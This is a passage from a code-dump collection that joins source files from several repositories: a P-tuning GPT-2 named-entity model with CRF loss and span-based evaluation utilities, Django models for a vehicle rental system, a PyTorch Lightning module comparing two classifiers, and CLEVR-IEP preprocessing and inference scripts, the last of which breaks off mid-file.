# block_length1 = self.template[0]
# block_length2 = self.template[1]
# for bidx in range(bz):
# for i in range(block_length1):
# raw_embeds[bidx, i:i+1, :] = replace_embeds[i, :]
# for j in range(block_length2):
# raw_embeds[bidx, l-block_length2+j:l-block_length2+j+1, :] = replace_embeds[block_length1+j, :]
        # output, _ = self.lstm(input[bidx, block_length1:l-block_length1, :].unsqueeze(0))  # the lstm input must be 3-dimensional
# raw_embeds[bidx, block_length1:l-block_length1, :] = output.squeeze(0)
        # # remember to use deepcopy here, otherwise the following error occurs (during loss.backward()):
# # RuntimeError: one of the variables needed for gradient computation has been modified
# # by an inplace operation: [torch.cuda.FloatTensor [1, 27, 768]], which is output 0 of
# # UnsqueezeBackward0, is at version 104; expected version 103 instead. Hint: enable
# # anomaly detection to find the operation that failed to compute its gradient, with
# # torch.autograd.set_detect_anomaly(True).
#
# return raw_embeds
#
# else:
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
            # also fill the final prompt position
raw_embeds[bidx, i+1+counts[bidx]+self.template[0], :] = replace_embeds[i+1+self.template[0], :]
return raw_embeds
def forward(self, input_ids, attention_mask=None, labels=None, token_type_ids=None, input_lens=None):
"""
Args:
input_ids: padded seuqence:[batch_size, max_length]
if Chinese: input_ids = [101,...,102, 0,...,0]
attention_mask: [batch_size, max_length]
token_type_ids: [batch_size, max_length]
position_ids: [batch_size, max_length]
head_mask: [batch_size, max_length]
labels: [batch_size, max_length]
Returns:
outputs
"""
bz = len(input_ids)
bx = len(input_ids[0])
prompt_tokens = [self.pseudo_token_id]
Bi_lstm = False
lstm = False
counts = []
queries = []
for i in range(bz):
query, count = self.get_query(input_ids[i], prompt_tokens, Bi_lstm, lstm)
counts.append(count)
queries.append(torch.LongTensor(query).squeeze(0))
queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
attention_mask1 = queries != self.pad_token_id
inputs_embeds = self.embed_input(queries, input_ids, Bi_lstm, lstm, counts)
inputs = inputs_embeds.to(self.device)
outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
# decode the output ids to see if there is some patterns
outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
example = torch.argsort(outputs2[0], dim=2, descending=True)[0, sum(self.template)+counts[0]+1:, 0]
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
sequence = torch.zeros(bz, bx, self.hidden_size).to(self.device)
for bdix in range(bz):
if self.template[0] == self.template[1]:
place = sum(self.template)+counts[bdix]
else:
place = self.template[0] + counts[bdix]
sequence[bdix, :counts[bdix], :] = sequence_output[bdix, place:place+counts[bdix], :]
        # TODO: only keep the inputs that correspond to non-pad ids
logits = self.classifier(sequence)
outputs = (example,)+outputs[2:]
outputs = (logits,) + outputs # add hidden states and attention if they are here
if labels is not None:
            loss = self.crf(emissions=logits, tags=labels, mask=attention_mask)  # the CRF layer computes the loss
# loss = self.lstmcrf(word_embeds=sequence_output, word_seq_length=word_seq_length,
# #emissions=logits,
# tags=labels, mask=attention_mask)
            # def forward(self, emissions: torch.Tensor, tags: torch.LongTensor,
            #             mask: Optional[torch.ByteTensor] = None, reduction: str = 'mean')  # mask is optional,
            #             -> torch.Tensor: loss
            # the mask acts as the denominator (normalization term) inside the CRF
outputs = (-1*loss,)+outputs
return outputs # (loss), scores
```
#### File: layers/common/sentence.py
```python
from typing import List
class Sentence:
def __init__(self, words: List[str], heads: List[int]=None , dep_labels: List[str]=None, pos_tags:List[str] = None):
self.words = words
self.heads = heads
self.dep_labels = dep_labels
self.pos_tags = pos_tags
def __len__(self):
return len(self.words)
# if __name__ == "__main__":
#
# words = ["a" ,"sdfsdf"]
# sent = Sentence(words)
#
# print(len(sent))
```
#### File: layers/config/eval.py
```python
import numpy as np
from typing import Tuple
from collections import defaultdict
class Span:
def __init__(self, left, right, type):
self.left = left
self.right = right
self.type = type
def __eq__(self, other):
return self.left == other.left and self.right == other.right and self.type == other.type
def __hash__(self):
return hash((self.left, self.right, self.type))
def to_str(self, sent):
return str(sent[self.left: (self.right+1)]) + ","+self.type
## The input to the evaluation should already contain the predictions (the predicted labels).
## IOBES tagging scheme.
### NOTE: this function is used to evaluate the instances with prediction ready.
def evaluate(insts):
p = 0
total_entity = 0
total_predict = 0
batch_p_dict = defaultdict(int)
batch_total_entity_dict = defaultdict(int)
batch_total_predict_dict = defaultdict(int)
for inst in insts:
output = inst.output
prediction = inst.prediction
#convert to span
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
batch_total_entity_dict[output[i][2:]] += 1
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
batch_total_entity_dict[output[i][2:]] += 1
start = -1
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
batch_total_predict_dict[prediction[i][2:]] += 1
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
batch_total_predict_dict[prediction[i][2:]] += 1
total_entity += len(output_spans)
total_predict += len(predict_spans)
correct_spans = predict_spans.intersection(output_spans)
p += len(correct_spans)
for span in correct_spans:
batch_p_dict[span.type] += 1
for key in batch_total_entity_dict:
precision_key, recall_key, fscore_key = get_metric(batch_p_dict[key], batch_total_entity_dict[key], batch_total_predict_dict[key])
print("[%s] Prec.: %.2f, Rec.: %.2f, F1: %.2f" % (key, precision_key, recall_key, fscore_key))
precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return [precision, recall, fscore]
def get_metric(p_num: int, total_num: int, total_predicted_num: int) -> Tuple[float, float, float]:
"""
Return the metrics of precision, recall and f-score, based on the number
(We make this small piece of function in order to reduce the code effort and less possible to have typo error)
:param p_num:
:param total_num:
:param total_predicted_num:
:return:
"""
precision = p_num * 1.0 / total_predicted_num * 100 if total_predicted_num != 0 else 0
recall = p_num * 1.0 / total_num * 100 if total_num != 0 else 0
fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return precision, recall, fscore
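# Quick worked example with made-up counts: p_num=8 correct spans, total_num=10 gold spans and
# total_predicted_num=16 predicted spans gives precision = 8/16*100 = 50.00,
# recall = 8/10*100 = 80.00 and fscore = 2*50*80/(50+80) ≈ 61.54.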
def evaluate_num(batch_insts, batch_pred_ids, batch_gold_ids, word_seq_lens, idx2label):
"""
evaluate the batch of instances
:param batch_insts:
:param batch_pred_ids:
:param batch_gold_ids:
:param word_seq_lens:
:param idx2label:
:return:
"""
p = 0
total_entity = 0
total_predict = 0
word_seq_lens = word_seq_lens.tolist()
for idx in range(len(batch_pred_ids)):
length = word_seq_lens[idx]
output = batch_gold_ids[idx][:length].tolist()
prediction = batch_pred_ids[idx][:length].tolist()
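# the decoded label sequence presumably comes out reversed from the decoder, so the next line restores the original order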
prediction = prediction[::-1]
output = [idx2label[l] for l in output]
prediction =[idx2label[l] for l in prediction]
batch_insts[idx].prediction = prediction
#convert to span
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
total_entity += len(output_spans)
total_predict += len(predict_spans)
p += len(predict_spans.intersection(output_spans))
# precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
# recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
# fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return np.asarray([p, total_predict, total_entity], dtype=int)
```
#### File: layers/config/utils.py
```python
import numpy as np
import torch
from typing import List
from ..common.instance import Instance
from .eval import Span
START = "<START>"
STOP = "<STOP>"
PAD = "<PAD>"
ROOT = "<ROOT>"
ROOT_DEP_LABEL = "root"
SELF_DEP_LABEL = "self"
def log_sum_exp_pytorch(vec):
"""
:param vec: [batchSize * from_label * to_label]
:return: [batchSize * to_label]
"""
maxScores, idx = torch.max(vec, 1)
maxScores[maxScores == -float("Inf")] = 0
maxScoresExpanded = maxScores.view(vec.shape[0] ,1 , vec.shape[2]).expand(vec.shape[0], vec.shape[1], vec.shape[2])
return maxScores + torch.log(torch.sum(torch.exp(vec - maxScoresExpanded), 1))
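# Shape sketch (hypothetical sizes): for vec of shape [batch=2, from_label=5, to_label=5],
# log_sum_exp_pytorch returns a [2, 5] tensor, i.e. the log-sum-exp over the "from" dimension
# for every "to" label, computed in a numerically stable way via the max trick.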
def simple_batching(config, insts: List[Instance]):
"""
:param config:
:param insts:
:return:
word_seq_tensor,
word_seq_len,
char_seq_tensor,
char_seq_len,
label_seq_tensor
"""
from config.config import DepModelType, ContextEmb
batch_size = len(insts)
batch_data = sorted(insts, key=lambda inst: len(inst.input.words), reverse=True) ##object-based not direct copy
word_seq_len = torch.LongTensor(list(map(lambda inst: len(inst.input.words), batch_data)))
max_seq_len = word_seq_len.max()
### NOTE: pad the character lengths with 1 (rather than 0); these slots belong to padding words, and we deduct for them later.
#### Use 1 here because the CharBiLSTM requires every word position to have at least one character.
char_seq_len = torch.LongTensor([list(map(len, inst.input.words)) + [1] * (int(max_seq_len) - len(inst.input.words)) for inst in batch_data])
max_char_seq_len = char_seq_len.max()
word_emb_tensor = None
if config.context_emb != ContextEmb.none:
emb_size = insts[0].elmo_vec.shape[1]
word_emb_tensor = torch.zeros((batch_size, max_seq_len, emb_size))
word_seq_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
label_seq_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
char_seq_tensor = torch.zeros((batch_size, max_seq_len, max_char_seq_len), dtype=torch.long)
adjs = None
adjs_in = None
adjs_out = None
dep_label_adj = None
dep_label_tensor = None
batch_dep_heads = None
trees = None
graphs = None
if config.dep_model != DepModelType.none:
if config.dep_model == DepModelType.dggcn:
adjs = [ head_to_adj(max_seq_len, inst, config) for inst in batch_data]
adjs = np.stack(adjs, axis=0)
adjs = torch.from_numpy(adjs)
dep_label_adj = [head_to_adj_label(max_seq_len, inst, config) for inst in batch_data]
dep_label_adj = torch.from_numpy(np.stack(dep_label_adj, axis=0)).long()
if config.dep_model == DepModelType.dglstm:
batch_dep_heads = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
dep_label_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
# trees = [inst.tree for inst in batch_data]
for idx in range(batch_size):
word_seq_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].word_ids)
label_seq_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].output_ids)
if config.context_emb != ContextEmb.none:
word_emb_tensor[idx, :word_seq_len[idx], :] = torch.from_numpy(batch_data[idx].elmo_vec)
if config.dep_model == DepModelType.dglstm:
batch_dep_heads[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].dep_head_ids)
dep_label_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].dep_label_ids)
for word_idx in range(word_seq_len[idx]):
char_seq_tensor[idx, word_idx, :char_seq_len[idx, word_idx]] = torch.LongTensor(batch_data[idx].char_ids[word_idx])
for wordIdx in range(word_seq_len[idx], max_seq_len):
char_seq_tensor[idx, wordIdx, 0: 1] = torch.LongTensor([config.char2idx[PAD]]) ### because the char length of padding words is set to 1 above, every character slot needs an id; strictly speaking 0 would be enough
### NOTE: make this step during forward if you have limited GPU resource.
word_seq_tensor = word_seq_tensor.to(config.device)
label_seq_tensor = label_seq_tensor.to(config.device)
char_seq_tensor = char_seq_tensor.to(config.device)
word_seq_len = word_seq_len.to(config.device)
char_seq_len = char_seq_len.to(config.device)
if config.dep_model != DepModelType.none:
if config.dep_model == DepModelType.dglstm:
batch_dep_heads = batch_dep_heads.to(config.device)
dep_label_tensor = dep_label_tensor.to(config.device)
return word_seq_tensor, word_seq_len, word_emb_tensor, char_seq_tensor, char_seq_len, adjs, adjs_in, adjs_out, graphs, dep_label_adj, batch_dep_heads, trees, label_seq_tensor, dep_label_tensor
def lr_decay(config, optimizer, epoch):
lr = config.learning_rate / (1 + config.lr_decay * (epoch - 1))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
print('learning rate is set to: ', lr)
return optimizer
def head_to_adj(max_len, inst, config):
"""
Convert a tree object to an (numpy) adjacency matrix.
"""
directed = config.adj_directed
self_loop = False #config.adj_self_loop
ret = np.zeros((max_len, max_len), dtype=np.float32)
for i, head in enumerate(inst.input.heads):
if head == -1:
continue
ret[head, i] = 1
if not directed:
ret = ret + ret.T
if self_loop:
for i in range(len(inst.input.words)):
ret[i, i] = 1
return ret
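# Tiny illustration (hypothetical 3-word sentence): heads = [1, -1, 1] (word 1 is the root)
# sets ret[1, 0] = 1 and ret[1, 2] = 1; when config.adj_directed is False the matrix is symmetrised.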
def head_to_adj_label(max_len, inst, config):
"""
Convert a tree object to an (numpy) adjacency matrix.
"""
directed = config.adj_directed
self_loop = config.adj_self_loop
dep_label_ret = np.zeros((max_len, max_len), dtype=np.int64)
for i, head in enumerate(inst.input.heads):
if head == -1:
continue
dep_label_ret[head, i] = inst.dep_label_ids[i]
if not directed:
dep_label_ret = dep_label_ret + dep_label_ret.T
if self_loop:
for i in range(len(inst.input.words)):
dep_label_ret[i, i] = config.root_dep_label_id
return dep_label_ret
def get_spans(output):
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
return output_spans
def preprocess(conf, insts, file_type:str):
print("[Preprocess Info]Doing preprocessing for the CoNLL-2003 dataset: {}.".format(file_type))
for inst in insts:
output = inst.output
spans = get_spans(output)
for span in spans:
if span.right - span.left + 1 < 2:
continue
count_dep = 0
for i in range(span.left, span.right + 1):
if inst.input.heads[i] >= span.left and inst.input.heads[i] <= span.right:
count_dep += 1
if count_dep != (span.right - span.left):
for i in range(span.left, span.right + 1):
if inst.input.heads[i] < span.left or inst.input.heads[i] > span.right:
if i != span.right:
inst.input.heads[i] = span.right
inst.input.dep_labels[i] = "nn" if "sd" in conf.affix else "compound"
```
#### File: models/p_tuning/prompt_encoder.py
```python
import torch
import torch.nn as nn
class PromptEncoder(torch.nn.Module):
def __init__(self, template, hidden_size, device):
super().__init__()
self.device = device
self.spell_length = sum(template)
self.hidden_size = hidden_size
# ent embedding
self.cloze_length = (template[0], template[1], 0)
self.cloze_mask = [
[1] * self.cloze_length[0] # first cloze
+ [1] * self.cloze_length[1] # second cloze
+ [1] * self.cloze_length[2] # third cloze
]
self.cloze_mask = torch.LongTensor(self.cloze_mask).bool().to(self.device)
self.seq_indices = torch.LongTensor(list(range(len(self.cloze_mask[0])))).to(self.device)
# embedding
self.embedding = torch.nn.Embedding(len(self.cloze_mask[0]), self.hidden_size).to(self.device)
# LSTM
self.lstm_head = torch.nn.LSTM(input_size=self.hidden_size,
hidden_size=self.hidden_size // 2,
num_layers=2,
dropout=0.0,# self.args.lstm_dropout = 0.0
bidirectional=True,
batch_first=True)
self.mlp_head = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size))
print("init prompt encoder...")
def forward(self, input_sequence=None):
if input_sequence is None:
input_embeds = self.embedding(self.seq_indices).unsqueeze(0)
output_embeds = self.mlp_head(self.lstm_head(input_embeds)[0]).squeeze()
else:
input_embeds = self.embedding(self.seq_indices).unsqueeze(0)
input_sequence = input_sequence.unsqueeze(0)
input_sequence = input_sequence.to(self.device)
#output_embeds = self.mlp_head(self.lstm_head(input_embeds)[0]).squeeze()
input_embeds_cat = torch.cat((input_embeds[:, 0:self.cloze_length[0]-1, :],
input_sequence, input_embeds[:, self.cloze_length[0]:self.cloze_length[0]*2-1, :]), dim=1)
output_embeds = self.mlp_head(self.lstm_head(input_embeds_cat)[0]).squeeze()
return output_embeds
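# Minimal smoke test (hypothetical sizes, not part of the original repo):
if __name__ == "__main__":
    enc = PromptEncoder(template=(3, 3), hidden_size=8, device="cpu")
    print(enc().shape)  # expected: torch.Size([6, 8]), one vector per pseudo prompt token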
``` |
{
"source": "2000090063/Vehicle_Rental_System-SDP-2-",
"score": 2
} |
#### File: Vehicle_Rental_System-SDP-2-/Owner/models.py
```python
from django.db import models
# Create your models here.
class Owner(models.Model):
Owner_id = models.AutoField(primary_key=True)
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license)
```
#### File: Vehicle_Rental_System-SDP-2-/RentVehicle/models.py
```python
from django.db import models
from Vehicles.models import Vehicle
from CustomerHome.models import Customer
from Owner.models import Owner
from Manager.models import Manager
# Create your models here.
class RentVehicle(models.Model):
RentVehicle_id = models.AutoField(primary_key=True)
RentVehicle_Date_of_Booking = models.DateField(blank=True,null=True)
RentVehicle_Date_of_Return = models.DateField(blank=True,null=True)
Total_days = models.IntegerField()
Advance_amount = models.IntegerField(blank=True,null=True)
RentVehicle_Total_amount = models.IntegerField(blank=True,null=True)
isAvailable = models.BooleanField(default=True)
isBillPaid = models.BooleanField(default=False)
Vehicle_license_plate = models.CharField(max_length=30)
customer_email = models.CharField(max_length=100)
request_responded_by = models.CharField(max_length=100,blank=True,null=True)
request_status = models.CharField(max_length=30,default="Pending")
def __str__(self):
return self.customer_email + ": " + str(self.Vehicle_license_plate)
``` |
{
"source": "20001LastOrder/Neural_Networks_Reliability_Analysis",
"score": 2
} |
#### File: PyTorch_CIFAR10/models_evaluation/evaluations.py
```python
import torch
import pytorch_lightning as pl
from pytorch_lightning.metrics import Accuracy
class CombinedNetwork(pl.LightningModule):
def __init__(self, model1, model2, hparams):
super().__init__()
self.hparams = hparams
self.model1 = model1
self.model2 = model2
self.accuracy = Accuracy()
def forward(self, batch):
pred1 = torch.argmax(self.model1(batch), dim=1)
pred2 = torch.argmax(self.model2(batch), dim=1)
return pred1, pred2
def training_step(self, batch, batch_nb):
raise RuntimeError("CombinedNetwork is evaluation-only; training is not supported")
def validation_step(self, batch, batch_nb):
raise RuntimeError("CombinedNetwork is evaluation-only; validation is not supported")
def test_step(self, batch, batch_nb):
images, labels = batch
n = labels.size(0)
pred1, pred2 = self.forward(images)
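# t1 / t2: per-batch accuracies of model1 and model2;
# tt: fraction of samples where model1 is correct and model2 predicts the same label;
# tf: fraction of samples where model1 is correct but model2 disagrees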
t1 = (pred1 == labels).sum().item() / n
t2 = (pred2 == labels).sum().item() / n
tt = ((pred1 == labels) * (pred1 == pred2)).sum().item() / n
tf = ((pred1 == labels) * (pred1 != pred2)).sum().item() / n
self.log('acc/t1', t1)
self.log('acc/t2', t2)
self.log('acc/tt', tt)
self.log('acc/tf', tf)
```
#### File: clevr-iep/iep/preprocess.py
```python
SPECIAL_TOKENS = {
'<NULL>': 0,
'<START>': 1,
'<END>': 2,
'<UNK>': 3,
}
def tokenize(s, delim=' ',
add_start_token=True, add_end_token=True,
punct_to_keep=None, punct_to_remove=None):
"""
Tokenize a sequence, converting a string s into a list of (string) tokens by
splitting on the specified delimiter. Optionally keep or remove certain
punctuation marks and add start and end tokens.
"""
if punct_to_keep is not None:
for p in punct_to_keep:
s = s.replace(p, '%s%s' % (delim, p))
if punct_to_remove is not None:
for p in punct_to_remove:
s = s.replace(p, '')
tokens = s.split(delim)
if add_start_token:
tokens.insert(0, '<START>')
if add_end_token:
tokens.append('<END>')
return tokens
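# Illustrative call (mirroring the flags used by run_model.py):
# tokenize("Is there a red cube?", punct_to_keep=[';', ','], punct_to_remove=['?', '.'])
# -> ['<START>', 'Is', 'there', 'a', 'red', 'cube', '<END>']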
def build_vocab(sequences, min_token_count=1, delim=' ',
punct_to_keep=None, punct_to_remove=None):
token_to_count = {}
tokenize_kwargs = {
'delim': delim,
'punct_to_keep': punct_to_keep,
'punct_to_remove': punct_to_remove,
}
for seq in sequences:
seq_tokens = tokenize(seq, **tokenize_kwargs,
add_start_token=False, add_end_token=False)
for token in seq_tokens:
if token not in token_to_count:
token_to_count[token] = 0
token_to_count[token] += 1
token_to_idx = {}
for token, idx in SPECIAL_TOKENS.items():
token_to_idx[token] = idx
for token, count in sorted(token_to_count.items()):
if count >= min_token_count:
token_to_idx[token] = len(token_to_idx)
return token_to_idx
def encode(seq_tokens, token_to_idx, allow_unk=False):
seq_idx = []
for token in seq_tokens:
if token not in token_to_idx:
if allow_unk:
token = '<UNK>'
else:
raise KeyError('Token "%s" not in vocab' % token)
seq_idx.append(token_to_idx[token])
return seq_idx
def decode(seq_idx, idx_to_token, delim=None, stop_at_end=True):
tokens = []
for idx in seq_idx:
tokens.append(idx_to_token[idx])
if stop_at_end and tokens[-1] == '<END>':
break
if delim is None:
return tokens
else:
return delim.join(tokens)
```
#### File: clevr-iep/iep/utils.py
```python
import json
import torch
from iep.models import ModuleNet, Seq2Seq, LstmModel, CnnLstmModel, CnnLstmSaModel
def invert_dict(d):
return {v: k for k, v in d.items()}
def load_vocab(path):
with open(path, 'r') as f:
vocab = json.load(f)
vocab['question_idx_to_token'] = invert_dict(vocab['question_token_to_idx'])
vocab['program_idx_to_token'] = invert_dict(vocab['program_token_to_idx'])
vocab['answer_idx_to_token'] = invert_dict(vocab['answer_token_to_idx'])
# Sanity check: make sure <NULL>, <START>, and <END> are consistent
assert vocab['question_token_to_idx']['<NULL>'] == 0
assert vocab['question_token_to_idx']['<START>'] == 1
assert vocab['question_token_to_idx']['<END>'] == 2
assert vocab['program_token_to_idx']['<NULL>'] == 0
assert vocab['program_token_to_idx']['<START>'] == 1
assert vocab['program_token_to_idx']['<END>'] == 2
return vocab
def load_cpu(path):
"""
Loads a torch checkpoint, remapping all Tensors to CPU
"""
return torch.load(path, map_location=lambda storage, loc: storage)
def load_program_generator(path):
checkpoint = load_cpu(path)
kwargs = checkpoint['program_generator_kwargs']
state = checkpoint['program_generator_state']
model = Seq2Seq(**kwargs)
model.load_state_dict(state)
return model, kwargs
def load_execution_engine(path, verbose=True):
checkpoint = load_cpu(path)
kwargs = checkpoint['execution_engine_kwargs']
state = checkpoint['execution_engine_state']
kwargs['verbose'] = verbose
model = ModuleNet(**kwargs)
cur_state = model.state_dict()
model.load_state_dict(state)
return model, kwargs
def load_baseline(path):
model_cls_dict = {
'LSTM': LstmModel,
'CNN+LSTM': CnnLstmModel,
'CNN+LSTM+SA': CnnLstmSaModel,
}
checkpoint = load_cpu(path)
baseline_type = checkpoint['baseline_type']
kwargs = checkpoint['baseline_kwargs']
state = checkpoint['baseline_state']
model = model_cls_dict[baseline_type](**kwargs)
model.load_state_dict(state)
return model, kwargs
```
#### File: clevr-iep/scripts/run_model.py
```python
import argparse
import json
import random
import shutil
import sys
import os
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision
import numpy as np
import h5py
# from scipy.misc import imread, imresize
import cv2
sys.path.append('.')
import iep.utils as utils
import iep.programs
from iep.data import ClevrDataset, ClevrDataLoader
from iep.preprocess import tokenize, encode
parser = argparse.ArgumentParser()
parser.add_argument('--program_generator', default=None)
parser.add_argument('--execution_engine', default=None)
parser.add_argument('--baseline_model', default=None)
parser.add_argument('--use_gpu', default=1, type=int)
# For running on a preprocessed dataset
parser.add_argument('--input_question_h5', default='data/val_questions.h5')
parser.add_argument('--input_features_h5', default='data-ssd/val_features.h5')
parser.add_argument('--use_gt_programs', default=0, type=int)
# This will override the vocab stored in the checkpoint;
# we need this to run CLEVR models on human data
parser.add_argument('--vocab_json', default=None)
# For running on a single example
parser.add_argument('--question', default=None)
parser.add_argument('--image', default=None)
parser.add_argument('--cnn_model', default='resnet101')
parser.add_argument('--cnn_model_stage', default=3, type=int)
parser.add_argument('--image_width', default=224, type=int)
parser.add_argument('--image_height', default=224, type=int)
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--num_samples', default=None, type=int)
parser.add_argument('--family_split_file', default=None)
parser.add_argument('--sample_argmax', type=int, default=1)
parser.add_argument('--temperature', default=1.0, type=float)
# If this is passed, then save all predictions to this file
parser.add_argument('--output_h5', default=None)
def main(args):
print()
model = None
if args.baseline_model is not None:
print('Loading baseline model from ', args.baseline_model)
model, _ = utils.load_baseline(args.baseline_model)
if args.vocab_json is not None:
new_vocab = utils.load_vocab(args.vocab_json)
model.rnn.expand_vocab(new_vocab['question_token_to_idx'])
elif args.program_generator is not None and args.execution_engine is not None:
print('Loading program generator from ', args.program_generator)
program_generator, _ = utils.load_program_generator(args.program_generator)
print('Loading execution engine from ', args.execution_engine)
execution_engine, _ = utils.load_execution_engine(args.execution_engine, verbose=False)
if args.vocab_json is not None:
new_vocab = utils.load_vocab(args.vocab_json)
program_generator.expand_encoder_vocab(new_vocab['question_token_to_idx'])
model = (program_generator, execution_engine)
else:
print('Must give either --baseline_model or --program_generator and --execution_engine')
return
if args.question is not None and args.image is not None:
run_single_example(args, model)
else:
vocab = load_vocab(args)
loader_kwargs = {
'question_h5': args.input_question_h5,
'feature_h5': args.input_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
}
if args.num_samples is not None and args.num_samples > 0:
loader_kwargs['max_samples'] = args.num_samples
if args.family_split_file is not None:
with open(args.family_split_file, 'r') as f:
loader_kwargs['question_families'] = json.load(f)
with ClevrDataLoader(**loader_kwargs) as loader:
run_batch(args, model, loader)
def load_vocab(args):
path = None
if args.baseline_model is not None:
path = args.baseline_model
elif args.program_generator is not None:
path = args.program_generator
elif args.execution_engine is not None:
path = args.execution_engine
return utils.load_cpu(path)['vocab']
def run_single_example(args, model):
dtype = torch.FloatTensor
if args.use_gpu == 1:
dtype = torch.cuda.FloatTensor
# Build the CNN to use for feature extraction
print('Loading CNN for feature extraction')
cnn = build_cnn(args, dtype)
# Load and preprocess the image
img_size = (args.image_height, args.image_width)
# img = imread(args.image, mode='RGB')
img = cv2.imread(args.image)
# img = imresize(img, img_size, interp='bicubic')
img = cv2.resize(img, (img_size[1], img_size[0]), interpolation=cv2.INTER_CUBIC)  # cv2.resize expects (width, height)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.transpose(2, 0, 1)[None]
mean = np.array([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)
std = np.array([0.229, 0.224, 0.225]).reshape(1, 3, 1, 1)
img = (img.astype(np.float32) / 255.0 - mean) / std
# Use CNN to extract features for the image
img_var = Variable(torch.FloatTensor(img).type(dtype))
img_var.requires_grad = False
feats_var = cnn(img_var)
# Tokenize the question
vocab = load_vocab(args)
question_tokens = tokenize(args.question,
punct_to_keep=[';', ','],
punct_to_remove=['?', '.'])
question_encoded = encode(question_tokens,
vocab['question_token_to_idx'],
allow_unk=True)
question_encoded = torch.LongTensor(question_encoded).view(1, -1)
question_encoded = question_encoded.type(dtype).long()
question_var = Variable(question_encoded)
question_var.requires_grad = False
# Run the model
print('Running the model\n')
scores = None
predicted_program = None
if type(model) is tuple:
program_generator, execution_engine = model
program_generator.type(dtype)
execution_engine.type(dtype)
predicted_program = program_generator.reinforce_sample(
question_var,
temperature=args.temperature,
argmax=(args.sample_argmax == 1))
scores = execution_engine(feats_var, predicted_program)
else:
model.type(dtype)
scores = model(question_var, feats_var)
# Print results
_, predicted_answer_idx = scores.data.cpu()[0].max(dim=0)
predicted_answer = vocab['answer_idx_to_token'][predicted_answer_idx.item()]
print('Question: "%s"' % args.question)
print('Predicted answer: ', predicted_answer)
if predicted_program is not None:
print()
print('Predicted program:')
program = predicted_program.data.cpu()[0]
num_inputs = 1
for fn_idx in program:
fn_str = vocab['program_idx_to_token'][fn_idx.item()]
num_inputs += iep.programs.get_num_inputs(fn_str) - 1
print(fn_str)
if num_inputs == 0:
break
def build_cnn(args, dtype):
if not hasattr(torchvision.models, args.cnn_model):
raise ValueError('Invalid model "%s"' % args.cnn_model)
if not 'resnet' in args.cnn_model:
raise ValueError('Feature extraction only supports ResNets')
whole_cnn = getattr(torchvision.models, args.cnn_model)(pretrained=True)
layers = [
whole_cnn.conv1,
whole_cnn.bn1,
whole_cnn.relu,
whole_cnn.maxpool,
]
for i in range(args.cnn_model_stage):
name = 'layer%d' % (i + 1)
layers.append(getattr(whole_cnn, name))
cnn = torch.nn.Sequential(*layers)
cnn.type(dtype)
cnn.eval()
return cnn
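# For reference, with the defaults above (resnet101 truncated after layer3) the extracted
# feature map has 1024 channels, i.e. 1024 x 14 x 14 for a 224 x 224 input, which matches
# the default --feature_dim of the training script.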
def run_batch(args, model, loader):
